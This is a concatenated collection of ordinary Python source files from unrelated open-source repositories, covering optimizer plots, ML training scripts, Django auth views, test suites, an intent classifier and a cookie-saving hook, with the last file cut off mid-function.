def test_authenticated(call_api, snapshot):
prepare_reports()
query = """
query {
reportDrafts {
id
date
published
title
body
receivedBenefit
providedBenefit
ourParticipants
otherParticipants
isDraft
edited
}
}
"""
response = call_api(query, user=User.objects.get(username="wolf"))
snapshot.assert_match(response)
| 887 |
setup.py
|
anmarkoulis/clickup-to-jira
| 2 |
2172882
|
import setuptools
version = "1.0.1"
def get_requirements_from_file(requirements_file):
"""
Get requirements from file.
    :param str requirements_file: Name of file to parse for requirements.
:return: List of requirements
:rtype: list(str)
"""
requirements = []
with open(requirements_file) as f:
for line in f:
line = line.strip()
if line and not line.startswith(("#", "-e")):
requirements.append(line)
return requirements
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="clickup-to-jira",
version=version,
author="<NAME>",
author_email="<EMAIL>",
description="A utility that helps migrating from Clickup to JIRA",
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(exclude=["tests", "docs"]),
include_package_data=True,
classifiers=[
"Development Status :: 4 - Beta",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.8",
"Operating System :: OS Independent",
],
entry_points={
"console_scripts": [
"migrate_to_jira = clickup_to_jira.scripts.migrate:main"
],
},
python_requires=">=3.8",
zip_safe=True,
install_requires=get_requirements_from_file("requirements.txt"),
tests_require=get_requirements_from_file("requirements-tests.txt"),
)
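# Installation sketch (added, not from the project's docs): from a checkout,
#
#     pip install .
#     migrate_to_jira
#
# should build the package and expose the console script declared in
# entry_points above.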
| 1,536 |
V_3rd/KernelLib_MD_JIT_CUDA/NAG.py
|
KhalilWong/Kernel_MD
| 1 |
2173132
|
import numpy as np
import numba as nb
import matplotlib.pyplot as mpl
################################################################################
def NAG_Method(v,x,mu,lr,dx):
#
pre_v=v
v=mu*v
v+=-lr*dx
x+=v+mu*(v-pre_v)
#
return(v,x)
################################################################################
def Momentum_Method(v,x,mu,lr,dx):
#
v=mu*v
v+=-lr*dx
x+=v
#
return(v,x)
################################################################################
def Adam_Method(t,v,cache,x,mu,decay_rate,lr,dx):
#
eps=0.0
#eps=1e-8
v=mu*v+(1-mu)*dx
vt=v/(1-mu**t)
cache=decay_rate*cache+(1-decay_rate)*dx**2
cachet=cache/(1-decay_rate**t)
x+=-(lr/(np.sqrt(cachet)+eps))*vt
#
return(v,cache,x)
################################################################################
def GD_Method(x,lr,dx):
#
x+=-lr*dx
#
return(x)
################################################################################
def F(x):
#
y=np.cos(x)+2*np.cos(x/2)+3*np.cos(x/3)+5*np.cos(x/5)
#y=3*x**4-4*x**3-12*x**2+17
#y=np.sin(x)-np.cos(x)
#
return(y)
################################################################################
def Gradient(x,delta):
#
y1=F(x-delta)
y2=F(x+delta)
dx=(y2-y1)/(2*delta)
#
return(dx)
################################################################################
def Data():
#
mu=0.9995
decay_rate=0.9995
lr=1e-4
Alr=1e-3
ilr=1e-3
delta=1e-4
#
v=0.0
Mv=v
Av=v
cache=0.0
x=-36.0
Mx=x
Ax=x
xx=x
ix=x
lx=36
N=20000
#
NAG=np.zeros((N+1,3))
M=np.zeros((N+1,3))
Adam=np.zeros((N+1,3))
GD=np.zeros((N+1,3))
THE=np.zeros((2*N+1,2))
NAG[0,0]=x
NAG[0,1]=F(x)
NAG[0,2]=0
M[0,0]=Mx
M[0,1]=F(Mx)
M[0,2]=0
Adam[0,0]=Ax
Adam[0,1]=F(Ax)
Adam[0,2]=0
GD[0,0]=xx
GD[0,1]=F(xx)
GD[0,2]=0
THE[N,0]=ix
THE[N,1]=F(ix)
#
for i in range(N):
dx=Gradient(x,delta)
v,x=NAG_Method(v,x,mu,lr,dx)
Mdx=Gradient(Mx,delta)
Mv,Mx=Momentum_Method(Mv,Mx,mu,lr,Mdx)
Adx=Gradient(Ax,delta)
Av,cache,Ax=Adam_Method(i+1,Av,cache,Ax,mu,decay_rate,Alr,Adx)
dxx=Gradient(xx,delta)
xx=GD_Method(xx,ilr,dxx)
NAG[i+1,0]=x
NAG[i+1,1]=F(x)
NAG[i+1,2]=i+1
M[i+1,0]=Mx
M[i+1,1]=F(Mx)
M[i+1,2]=i+1
Adam[i+1,0]=Ax
Adam[i+1,1]=F(Ax)
Adam[i+1,2]=i+1
GD[i+1,0]=xx
GD[i+1,1]=F(xx)
GD[i+1,2]=i+1
THE[N-i-1,0]=ix-(i+1)/N*lx/5
THE[N-i-1,1]=F(THE[N-i-1,0])
THE[N+i+1,0]=ix+(i+1)/N*lx
THE[N+i+1,1]=F(THE[N+i+1,0])
#
return(NAG,M,Adam,GD,THE)
################################################################################
def main():
#
NAG,M,Adam,GD,THE=Data()
#
fig1=mpl.figure()
mpl.scatter(NAG[:,0],NAG[:,1],marker='o',color='',edgecolors='r',s=10,label='NAG')
mpl.scatter(M[:,0],M[:,1],marker='^',color='',edgecolors='g',s=10,label='Momentum')
mpl.scatter(Adam[:,0],Adam[:,1],marker='X',color='',edgecolors='b',s=10,label='Adam')
mpl.scatter(GD[:,0],GD[:,1],marker='*',color='',edgecolors='m',s=10,label='GD')
mpl.plot(THE[:,0],THE[:,1],'k--',markersize=4,label='THE')
mpl.legend(loc='upper right',fontsize='xx-small')
mpl.xlabel('$x$')
mpl.ylabel('$y$')
mpl.savefig('Function.png',dpi=600)
#
fig2=mpl.figure()
mpl.scatter(NAG[:,2],NAG[:,0],marker='o',color='',edgecolors='r',s=10,label='NAG')
mpl.scatter(M[:,2],M[:,0],marker='^',color='',edgecolors='g',s=10,label='Momentum')
mpl.scatter(Adam[:,2],Adam[:,0],marker='X',color='',edgecolors='b',s=10,label='Adam')
mpl.scatter(GD[:,2],GD[:,0],marker='*',color='',edgecolors='m',s=10,label='GD')
mpl.legend(loc='upper right',fontsize='xx-small')
mpl.xlabel('$Loops$')
mpl.ylabel('$x$')
mpl.savefig('x_Loop.png',dpi=600)
#
fig3=mpl.figure()
mpl.scatter(NAG[:,2],NAG[:,1],marker='o',color='',edgecolors='r',s=10,label='NAG')
mpl.scatter(M[:,2],M[:,1],marker='^',color='',edgecolors='g',s=10,label='Momentum')
mpl.scatter(Adam[:,2],Adam[:,1],marker='X',color='',edgecolors='b',s=10,label='Adam')
mpl.scatter(GD[:,2],GD[:,1],marker='*',color='',edgecolors='m',s=10,label='GD')
mpl.legend(loc='upper right',fontsize='xx-small')
mpl.xlabel('$Loops$')
mpl.ylabel('$y$')
mpl.savefig('y_Loop.png',dpi=600)
#
#mpl.show()
mpl.close()
################################################################################
if __name__ == "__main__":
main()
| 4,728 |
src/sklearn_evaluation/plot/learning_curve.py
|
abcnishant007/sklearn-evaluation
| 351 |
2172707
|
import numpy as np
import matplotlib.pyplot as plt
def learning_curve(train_scores, test_scores, train_sizes, ax=None):
"""Plot a learning curve
Plot a metric vs number of examples for the training and test set
Parameters
----------
train_scores : array-like
Scores for the training set
test_scores : array-like
Scores for the test set
train_sizes : array-like
Relative or absolute numbers of training examples used to generate
the learning curve
ax : matplotlib Axes
Axes object to draw the plot onto, otherwise uses current Axes
Returns
-------
ax: matplotlib Axes
Axes containing the plot
Examples
--------
.. plot:: ../../examples/learning_curve.py
"""
if ax is None:
ax = plt.gca()
ax.grid()
ax.set_title("Learning Curve")
ax.set_xlabel("Training examples")
ax.set_ylabel("Score mean")
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
ax.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
ax.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
ax.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
ax.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Cross-validation score")
ax.legend(loc="best")
ax.margins(0.05)
return ax
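# Usage sketch (added, separate from the packaged example): generate the score
# matrices with scikit-learn and hand them to the plot; the dataset and
# estimator choices here are arbitrary assumptions.
if __name__ == "__main__":
    from sklearn.datasets import load_digits
    from sklearn.linear_model import LogisticRegression
    from sklearn.model_selection import learning_curve as sk_learning_curve
    X, y = load_digits(return_X_y=True)
    sizes, train_scores, test_scores = sk_learning_curve(
        LogisticRegression(max_iter=1000), X, y, cv=5,
        train_sizes=np.linspace(0.1, 1.0, 5))
    learning_curve(train_scores, test_scores, sizes)
    plt.show()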
| 1,728 |
src/gan-dogs/data/preprocessing.py
|
caciolai/Generative-Dog-Images-with-BigGan
| 0 |
2172185
|
import tensorflow as tf
@tf.function
def augment(img):
"""Augments the current image
Args:
img (tf.Tensor): image
Returns:
tf.Tensor: augmented image
"""
# random mirroring
img = tf.image.random_flip_left_right(img)
# # randomly adjust saturation and brightness
# img = tf.image.random_saturation(img, 0, 1)
# img = tf.image.random_brightness(img, 0.1)
# img = tf.clip_by_value(img, -1., 1.)
return img
@tf.function
def preprocess(img, y):
"""Preprocessing pipeline for a (image, label) sample
Args:
img (tf.Tensor): image
y (tf.Tensor): label
Returns:
(tf.Tensor, tf.Tensor): transformed (image, label) sample
"""
# normalization in [-1, 1]
# img = normalize(img)
# data augmentation
img = augment(img)
return img, y
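# Illustrative pipeline wiring (added): how preprocess() might be mapped over a
# tf.data.Dataset; the toy tensors below are assumptions, not project data.
if __name__ == "__main__":
    images = tf.random.uniform((8, 64, 64, 3), minval=-1.0, maxval=1.0)
    labels = tf.zeros((8,), dtype=tf.int32)
    dataset = tf.data.Dataset.from_tensor_slices((images, labels)).map(preprocess).batch(4)
    for batch_images, batch_labels in dataset.take(1):
        print(batch_images.shape, batch_labels.shape)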
| 850 |
cadnano/views/abstractitems/abstractvirtualhelixitem.py
|
mctrinh/cadnano2.5
| 1 |
2170373
|
# -*- coding: utf-8 -*-
from cadnano.extras.wrapapi import copyWrapAPI
from cadnano.part.virtualhelix import VirtualHelix
class AbstractVirtualHelixItem(object):
"""
AbstractVirtualHelixItem is a base class for virtualhelixitem in all views.
It includes slots that get connected in VirtualHelixItemController which
can be overridden.
Slots that must be overridden should raise an exception.
"""
def __init__(self, model_virtual_helix=None, parent=None):
# super().__init__(**kwargs)
self._model_vh = model_virtual_helix
self._id_num = model_virtual_helix.idNum() if model_virtual_helix is not None else None
self._part_item = parent
self._model_part = model_virtual_helix.part() if model_virtual_helix is not None else None
self.is_active = False
# end def
def virtualHelixPropertyChangedSlot(self, virtual_helix, transform):
pass
# end def
def virtualHelixRemovedSlot(self):
pass
# end def
def strandAddedSlot(self, sender, strand):
pass
# end def
def cnModel(self):
return self._model_vh
# end def
def partItem(self):
return self._part_item
# end def
# end class
# ADD model methods to class
copyWrapAPI(VirtualHelix, AbstractVirtualHelixItem, attr_str='_model_vh')
| 1,338 |
Ejercicios metodos de colecciones/Ejercicios_diccionarios.py
|
jaramosperez/Pythonizando
| 1 |
2173107
|
colores = { "amarillo":"yellow", "azul":"blue", "verde":"green" }
print(colores.get('Negro'))
print(colores.keys())
print(colores.values())
colores.items()
for clave, valor in colores.items():
print(clave, valor)
print(colores.pop("amarillo", "no se ha encontrado"))
print(colores.pop("Negro", "no se ha encontrado"))
colores.clear()
print(colores)
| 358 |
fasionAI.py
|
Endersky78/AIProject
| 0 |
2172701
|
import tensorflow as tf
from tensorflow import keras
import numpy as np
import matplotlib.pyplot as plt
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
data = keras.datasets.fashion_mnist
np.set_printoptions(precision=4)
class_names = ['T-shirt/Top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
(train_images, train_labels), (test_images, test_labels) = data.load_data()
train_images = train_images.astype('float32') / 255.0
test_images = test_images.astype('float32') / 255.0
model = keras.Sequential([
keras.layers.Flatten(input_shape=(28, 28)),
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax')
])
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.fit(train_images, train_labels, batch_size=64, epochs=10)
prediction = model.predict([test_images])
for i in range(5):
plt.grid(False)
plt.imshow(test_images[i], cmap=plt.cm.binary)
plt.xlabel("Actual: " + class_names[test_labels[i]])
plt.title("Prediction: " + class_names[np.argmax(prediction[i])])
plt.show()
print(class_names[np.argmax(prediction[0])])
| 1,203 |
main.py
|
psoulos/space-of-representations
| 0 |
2173061
|
import os
import tensorflow as tf
import time
# See the __init__ script in the models folder
# `make_models` is a helper function to load any models you have
from models import FullyConnectedDiscriminator, ConvDiscriminator, FullyConnectedVAE, ConvVAE
dir = os.path.dirname(os.path.realpath(__file__))
flags = tf.app.flags
# Model config
flags.DEFINE_boolean('conv', True, 'Whether the hidden layer is convolution or fully connected')
flags.DEFINE_boolean('vae', True, 'Whether the model is generative (vae) or discriminative')
flags.DEFINE_string('activation', 'relu', 'The hidden layer activation function {relu|sigmoid}')
flags.DEFINE_integer('hidden_size', 10, 'The number of units in the hidden layer for fully '
'connected discriminator or the number of features for a convolutional '
'discriminator. The size of the latent vector for a VAE.')
flags.DEFINE_integer('kernel_size', 5, 'The size of the convolution patch')
flags.DEFINE_integer('num_features', 5, 'The number of features for a convolution layer')
flags.DEFINE_integer('beta', 1, 'The coefficient to impose on the VAE divergence.'
' 1 is a standard VAE.')
# Training config
flags.DEFINE_float('learning_rate', 1e-3, 'The learning rate')
flags.DEFINE_integer('num_epochs', 1, 'The number of epochs to train for')
flags.DEFINE_integer('iter_per_epoch', 50000, 'The number of iterations per epoch')
# Other config
flags.DEFINE_string('model_name', 'model', 'Unique name of the model')
flags.DEFINE_string('result_dir', dir + '/results/' + flags.FLAGS.model_name + '/' +
time.strftime('%Y-%m-%d-%H-%M-%S'), 'Name of the directory to store/log the '
'model (if it exists, the model will be loaded from it)')
def main(_):
config = flags.FLAGS.__flags.copy()
if config['vae']:
if config['conv']:
print('Training a convolutional vae')
model = ConvVAE(config)
else:
print('Training a fully connected vae')
model = FullyConnectedVAE(config)
else:
if config['conv']:
print('Training a convolutional discriminator')
model = ConvDiscriminator(config)
else:
print('Training a fully connected discriminator')
model = FullyConnectedDiscriminator(config)
print('Model created')
model.train()
if __name__ == '__main__':
tf.app.run()
| 2,461 |
professionnel/views.py
|
john591/m243
| 0 |
2171558
|
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
#from . serializers import UserProfilSerializer
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.contrib.auth.decorators import login_required
# Create your views here.
from .models import *
from .forms import CreateUserForm, UserProfilForm, UserSearchForm
def home(request):
if request.user.is_authenticated:
return redirect('accueil')
else:
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect('accueil')
else:
messages.info(request, 'Nom utilisateur ou Mot de passe incorrect!')
context = {}
return render(request, "professionnel/index.html", context)
def logoutUser(request):
logout(request)
return redirect('home')
def registerPage(request):
if request.user.is_authenticated:
return redirect('accueil')
else:
form = CreateUserForm()
profil_form = UserProfilForm()
if request.method == 'POST':
form = CreateUserForm(request.POST)
profil_form = UserProfilForm(request.POST)
if form.is_valid() and profil_form.is_valid():
user = form.save()
profil = profil_form.save(commit=False)
profil.user = user
profil.save()
user = form.cleaned_data.get('username')
messages.success(request, user + ' ' + 'votre compte a été créé !' )
return redirect('home')
context = {'form':form, 'profil_form':profil_form}
return render(request, 'professionnel/register.html', context)
@login_required(login_url='home')
def accueilPage(request):
context = {}
return render(request, 'professionnel/accueil.html', context)
@login_required(login_url='home')
def findPage(request):
queryset = UserProfil.objects.all()
form = UserSearchForm(request.POST or None)
context = {'queryset':queryset,'form':form}
if request.method == 'POST':
        queryset = UserProfil.objects.all().order_by('id').filter(
            profession__icontains=form['profession'].value(),
            commune__icontains=form['commune'].value(),
            quartier__icontains=form['quartier'].value())
context = {
'queryset':queryset,
'form':form
}
return render(request, 'professionnel/find.html', context)
"""
class UserProfilList(APIView):
def get(self, request):
userProfessional = UserProfil.objects.all()
serializer = UserProfilSerializer(userProfessional, many= True)
return Response(serializer.data)
def post(self):
pass
"""
| 3,308 |
cm/tests_runner.py
|
amleshkov/adcm
| 0 |
2171912
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from unittest.mock import patch, Mock, mock_open
from django.test import TestCase
from django.utils import timezone
import cm.config as config
import job_runner
import task_runner
from cm.logger import log
from cm.models import TaskLog, JobLog
class PreparationData:
def __init__(self, number_tasks, number_jobs):
self.number_tasks = number_tasks
self.number_jobs = number_jobs
self.tasks = []
self.jobs = []
self.to_prepare()
def to_prepare(self):
for task_id in range(1, self.number_tasks + 1):
task_log_data = {
'action_id': task_id,
'object_id': task_id,
'pid': task_id,
'selector': {'cluster': task_id},
'status': 'success',
'config': '',
'hostcomponentmap': '',
'start_date': timezone.now(),
'finish_date': timezone.now()
}
self.tasks.append(TaskLog.objects.create(**task_log_data))
for jn in range(1, self.number_jobs + 1):
job_log_data = {
'task_id': task_id,
'action_id': task_id,
'pid': jn + 1,
'selector': {'cluster': task_id},
'status': 'success',
'start_date': timezone.now(),
'finish_date': timezone.now()
}
self.jobs.append(JobLog.objects.create(**job_log_data))
def get_task(self, _id):
return self.tasks[_id - 1]
def get_job(self, _id):
return self.jobs[_id - 1]
class TestTaskRunner(TestCase):
def setUp(self):
log.debug = Mock()
log.error = Mock()
log.info = Mock()
@patch('builtins.open')
def test_open_file(self, _mock_open):
file_path = "{}/{}-{}.txt".format('root', 'tag', 1)
task_runner.open_file('root', 1, 'tag')
_mock_open.assert_called_once_with(file_path, 'w')
@patch('subprocess.Popen')
def test_run_job(self, mock_subprocess_popen):
process_mock = Mock()
attrs = {'wait.return_value': 0}
process_mock.configure_mock(**attrs)
mock_subprocess_popen.return_value = process_mock
code = task_runner.run_job(1, 1, '', '')
self.assertEqual(code, 0)
@patch('task_runner.open_file')
@patch('cm.job.set_task_status')
@patch('cm.job.re_prepare_job')
@patch('task_runner.run_job')
@patch('cm.job.finish_task')
def test_run_task(self, mock_finish_task, mock_run_job, mock_re_prepare_job,
mock_set_task_status, mock_open_file):
mock_run_job.return_value = 0
_file = Mock()
mock_open_file.return_value = _file
pd = PreparationData(1, 1)
task_runner.run_task(1)
task = pd.get_task(1)
job = pd.get_job(1)
mock_finish_task.assert_called_once_with(task, job, config.Job.SUCCESS)
mock_run_job.assert_called_once_with(task.id, job.id, _file, _file)
mock_re_prepare_job.assert_not_called()
mock_set_task_status.assert_called_once_with(task, config.Job.RUNNING)
self.assertTrue(JobLog.objects.get(id=1).start_date != job.start_date)
@patch('task_runner.run_task')
@patch('sys.exit')
def test_do(self, mock_exit, mock_run_task):
with patch('sys.argv', [__file__, 1]):
task_runner.do()
self.assertEqual(mock_exit.call_count, 0)
mock_run_task.assert_called_once_with(1)
class TestJobRunner(TestCase):
def setUp(self):
log.info = Mock()
log.debug = Mock()
log.error = Mock()
@patch('builtins.open')
def test_open_file(self, _mock_open):
file_path = "{}/{}-{}.txt".format('root', 'tag', 1)
job_runner.open_file('root', 1, 'tag')
_mock_open.assert_called_once_with(file_path, 'w')
@patch('json.load')
@patch('builtins.open', create=True)
def test_read_config(self, _mock_open, mock_json):
_mock_open.side_effect = mock_open(read_data='').return_value
mock_json.return_value = {}
conf = job_runner.read_config(1)
file_name = '{}/{}-config.json'.format(config.RUN_DIR, 1)
_mock_open.assert_called_once_with(file_name)
self.assertDictEqual(conf, {})
@patch('cm.job.set_job_status')
def test_set_job_status(self, mock_set_job_status):
mock_set_job_status.return_value = None
code = job_runner.set_job_status(1, 0, 1)
self.assertEqual(code, 0)
mock_set_job_status.assert_called_once_with(1, config.Job.SUCCESS, 1)
def test_set_pythonpath(self):
cmd_env = os.environ.copy()
python_paths = filter(
lambda x: x != '',
['./pmod'] + cmd_env.get('PYTHONPATH', '').split(':'))
cmd_env['PYTHONPATH'] = ':'.join(python_paths)
self.assertDictEqual(cmd_env, job_runner.set_pythonpath())
@patch('cm.job.set_job_status')
@patch('sys.exit')
@patch('job_runner.set_job_status')
@patch('job_runner.set_pythonpath')
@patch('subprocess.Popen')
@patch('os.chdir')
@patch('job_runner.open_file')
@patch('job_runner.read_config')
def test_run_ansible( # pylint: disable=too-many-arguments
self, mock_read_config, mock_open_file, mock_chdir, mock_subprocess_popen,
mock_set_pythonpath, mock_set_job_status, mock_exit, mock_job_set_job_status):
conf = {
'job': {'playbook': 'test'},
'env': {'stack_dir': 'test'}
}
mock_read_config.return_value = conf
_file = Mock()
mock_open_file.return_value = _file
process_mock = Mock()
process_mock.pid = 1
attrs = {'wait.return_value': 0}
process_mock.configure_mock(**attrs)
mock_subprocess_popen.return_value = process_mock
python_path = Mock()
mock_set_pythonpath.return_value = python_path
job_runner.run_ansible(1)
mock_read_config.assert_called_once_with(1)
self.assertEqual(mock_open_file.call_count, 2)
mock_open_file.assert_any_call(config.LOG_DIR, 'ansible-out', 1)
mock_open_file.assert_any_call(config.LOG_DIR, 'ansible-err', 1)
mock_chdir.assert_called_with(conf['env']['stack_dir'])
mock_set_job_status.assert_called_once_with(1, 0, 1)
mock_subprocess_popen.assert_called_once_with(
[
'ansible-playbook',
'-e',
'@{}/{}-config.json'.format(config.RUN_DIR, 1),
'-i',
'{}/{}-inventory.json'.format(config.RUN_DIR, 1),
conf['job']['playbook']
], env=python_path, stdout=_file, stderr=_file)
self.assertEqual(mock_set_pythonpath.call_count, 1)
self.assertEqual(mock_exit.call_count, 1)
mock_job_set_job_status.assert_called_with(1, config.Job.RUNNING, 1)
@patch('job_runner.run_ansible')
@patch('sys.exit')
def test_do(self, mock_exit, mock_run_ansible):
with patch('sys.argv', [__file__, 1]):
job_runner.do()
self.assertEqual(mock_exit.call_count, 0)
self.assertEqual(mock_run_ansible.call_count, 1)
mock_run_ansible.assert_called_once_with(1)
| 7,905 |
DialogEngine/res/entities/classifier/module/processQuery.py
|
hmi-digital/bot_platform
| 0 |
2172667
|
# -*- coding: utf-8 -*-
import os
import glob
import sys
import re
import codecs
import _pickle as cPickle
from nltk.stem import SnowballStemmer
from nltk import word_tokenize
from nltk.corpus import stopwords
from sklearn.metrics.pairwise import linear_kernel
domain=sys.argv[1]
scriptDir=os.path.dirname(__file__)
picklePath=os.path.join(scriptDir,'..','model',domain+'_')
intent=cPickle.load(open(picklePath+'intent.m','rb'))
utterance=cPickle.load(open(picklePath+'utterance.m','rb'))
tfidfVec=cPickle.load(open(picklePath+'tfidfVec.m','rb'))
svd=cPickle.load(open(picklePath+'svd.m','rb'))
trainLSA=cPickle.load(open(picklePath+'trainLSA.m','rb'))
stopwordFile=os.path.join(scriptDir,'..','..','..','dictionary','stopwords_en.txt')
arrayWords=[]
stopWords=[]
sList=[line.rstrip('\n')for line in codecs.open((stopwordFile),'r+','utf-8')]
for line in sList:
if line!="":
arrayWords.append(line.split(','))
for a_word in arrayWords:
for s_word in a_word:
if(re.sub(' ','',s_word))!="":
stopWords.append(s_word)
swList=set(stopWords)
stopwordList=set(stopwords.words('english'))|swList
def stopwordRemover(utterance):
word_tokens=word_tokenize(utterance)
return ' '.join([w for w in word_tokens if not w in stopwordList])
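# Replace the nth occurrence of sub in string with repl; the string is returned unchanged if there are fewer than nth occurrences.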
def replace_nth(string,sub,repl,nth):
find=string.find(sub)
i=find!=-1
while find!=-1 and i!=nth:
find=string.find(sub,find+1)
i+=1
if i==nth:
return string[:find]+repl+string[find+len(sub):]
return string
def wordReplacer(utter,matchedDict,combinations):
matchedDict=matchedDict.copy()
while(len(matchedDict)>0):
replacement=matchedDict.popitem()
for wordReplacement in replacement[1]['synonym']:
new_utter=utter.replace(replacement[0],wordReplacement)
combinations.append(new_utter)
wordReplacer(new_utter,matchedDict,combinations)
def genSentences(utter,matchedDict,combinations):
matchedDict=matchedDict.copy()
while(len(matchedDict)>0):
replacement=matchedDict.popitem()
for count in range(replacement[1]['count']):
for wordReplacement in replacement[1]['synonym']:
new_utter=replace_nth(utter,replacement[0],wordReplacement,count+1)
combinations.append(new_utter)
wordReplacer(new_utter,matchedDict,combinations)
def processUtterance(utter):
scoreList={}
idList={}
for query in utter:
query=stopwordRemover(query.lower())
query=[query]
test=tfidfVec.transform(query).toarray()
LSATest=svd.transform(test)
cosineSimilarities=linear_kernel(LSATest,trainLSA).flatten()
related_docs_indices=cosineSimilarities.argsort()[::-1]
for i in range(len(related_docs_indices)):
fID=related_docs_indices[i]
fScore=cosineSimilarities[fID]
fIntent=intent[related_docs_indices[i]]
if(fIntent in scoreList):
scoreList[fIntent]=max(fScore,scoreList[fIntent])
if(fScore>cosineSimilarities[idList.get(fIntent)]):
idList[fIntent]=fID
else:
scoreList[fIntent]=fScore
idList[fIntent]=fID
orderedIntents=sorted(scoreList,key=scoreList.get,reverse=True)
response={'class_1':orderedIntents[0],'score_1':"{:.2f}".format(scoreList[orderedIntents[0]])}
return response
synonymFile=os.path.join(scriptDir,'..','..','..','dictionary','synonyms_en.txt')
with codecs.open(synonymFile,'r','utf-8')as rawSynonymsFileobj:
rawSynonyms=rawSynonymsFileobj.read()
rawSynonyms=rawSynonyms.split('\n')
synonymsList=[]
for i in rawSynonyms:
synonymsList.append(i.split(','))
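# genUtterances expands an utterance into every variant obtained by substituting dictionary synonyms for its words.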
def genUtterances(utter):
matched={}
utteranceSet=set(utter.split())
for synonym in synonymsList:
for word in set(synonym)&utteranceSet:
count=utter.split().count(word)
matched[word]={'synonym':list(set(synonym)-set([word])),'count':count}
combinations=[utter]
genSentences(utter,matched,combinations)
combinations.sort()
return combinations
# Created by pyminifier (https://github.com/liftoff/pyminifier)
| 3,798 |
src/others/tests/test_sparse_similarity.py
|
seahrh/coding-interview
| 0 |
2171882
|
from others.sparse_similarity import *
class TestSparseSimilarity:
def test_given_example_1(self):
assert positive_similarity(
[
Document(id=13, words={14, 15, 100, 9, 3}),
Document(id=16, words={32, 1, 9, 3, 5}),
Document(id=19, words={15, 29, 2, 6, 8, 7}),
Document(id=24, words={7, 10, 11}),
]
) == [
Pair(d1=16, d2=13, sim=0.25),
Pair(d1=19, d2=24, sim=0.125),
Pair(d1=19, d2=13, sim=0.1),
]
| 567 |
dashapp/functions.py
|
anas-rabhi/quick-dash
| 0 |
2173008
|
import dash
import numpy as np
from dash import dcc, html
from dash.dependencies import Input, Output
from typing import Dict, List, Callable
import pandas as pd
filters = {
'checklist': dcc.Checklist, # labelStyle={'display': 'inline-block'}
'alert': dcc.ConfirmDialog,
'date_range': dcc.DatePickerRange,
'dropdown': dcc.Dropdown,
'checkbox': dcc.RadioItems,
'range_slider': dcc.RangeSlider,
'slider': dcc.Slider
}
######## ADD checkbox & radioitems
######## text box output
def show():
print(filters)
def define_params(data: pd.DataFrame, ftype: str, var: str, id: str, **params):
displayed = filters[ftype]
param = {}
if ftype in ['slider']:
if 'value' not in params:
params['value'] = data[var].max()
param['id'] = id
param['min'] = data[var].min()
param['max'] = data[var].max()
param['step'] = (data[var].max() - data[var].min())/10
param['tooltip'] = {"placement": "bottom", "always_visible": True}
return displayed(**param, **params)
if ftype in ['dropdown']:
if 'value' not in params:
params['value'] = None
param['options'] = [{'label': i, 'value': i} for i in data[var].unique().tolist()]
param['id'] = id
return displayed(**param, **params)
if ftype in ['date_range']:
param['id'] = id
param['min_date_allowed'] = data[var].min()
        param['max_date_allowed'] = data[var].max()
param['initial_visible_month'] = data[var].min()
return displayed(**param, **params)
#data = pd.DataFrame({'a': ['c', 'd'], 'b': [20, 40]})
#define_params(data, 'checklist', 'a', '555a')
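# Hedged usage sketch (the frame 'df', column 'b' and id 'slider-b' below are made-up examples):
# the 'slider' branch derives min/max/step from the numeric column and returns a dcc.Slider.
#df = pd.DataFrame({'a': ['c', 'd'], 'b': [20, 40]})
#define_params(df, 'slider', 'b', 'slider-b')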
| 1,697 |
snafu/benchmarks/__init__.py
|
dagrayvid/benchmark-wrapper
| 14 |
2172997
|
#!/usr/bin/env python3
"""snafu benchmark wrappers."""
# -*- coding: utf-8 -*-
# flake8: noqa
# pylint: disable=W0611
from snafu.benchmarks._benchmark import Benchmark, BenchmarkResult
from snafu.benchmarks._load_benchmarks import load_benchmarks
DETECTED_BENCHMARKS = load_benchmarks()
| 288 |
hooks/cookies.py
|
leigingban/webtools
| 0 |
2171397
|
import json
import re
from json import JSONDecodeError
from ext_app.webtools.hooks import BaseHook
class CookieSavingHook(BaseHook):
def __init__(self, file=None, path=None):
super().__init__(file, path)
def run(self):
if cookie := self.r.headers.get('Set-Cookie'):
cookie_new = self.cookies_from_response(cookie)
            # Use domain + path as the unique key so an existing entry is replaced on update
uni_cookies_name = cookie_new.get('Domain') + cookie_new.get('Path')
cookies_org = self.load_cookies_from_file()
cookies_org.update({uni_cookies_name: cookie_new})
self.save_cookies_to_json(cookies_org)
else:
pass
@property
def domain(self) -> str:
return re.findall('//(.*?)/', self.r.url)[0]
def cookies_from_response(self, cookie: str):
"""
__ckguid=WS44Xy95cAbHEjgVRAo4Nq2; Max-Age=31536000; Domain=smzdm.com; Path=/; HttpOnly,
__jsluid_s=8e8770c491de42ddea726d37aa4cb2e2; max-age=31536000; path=/; HttpOnly; secure
"""
_dict = {}
_kvs = {}
for first_items in cookie.split(', '):
for second_items in first_items.split('; '):
_kv = second_items.split('=')
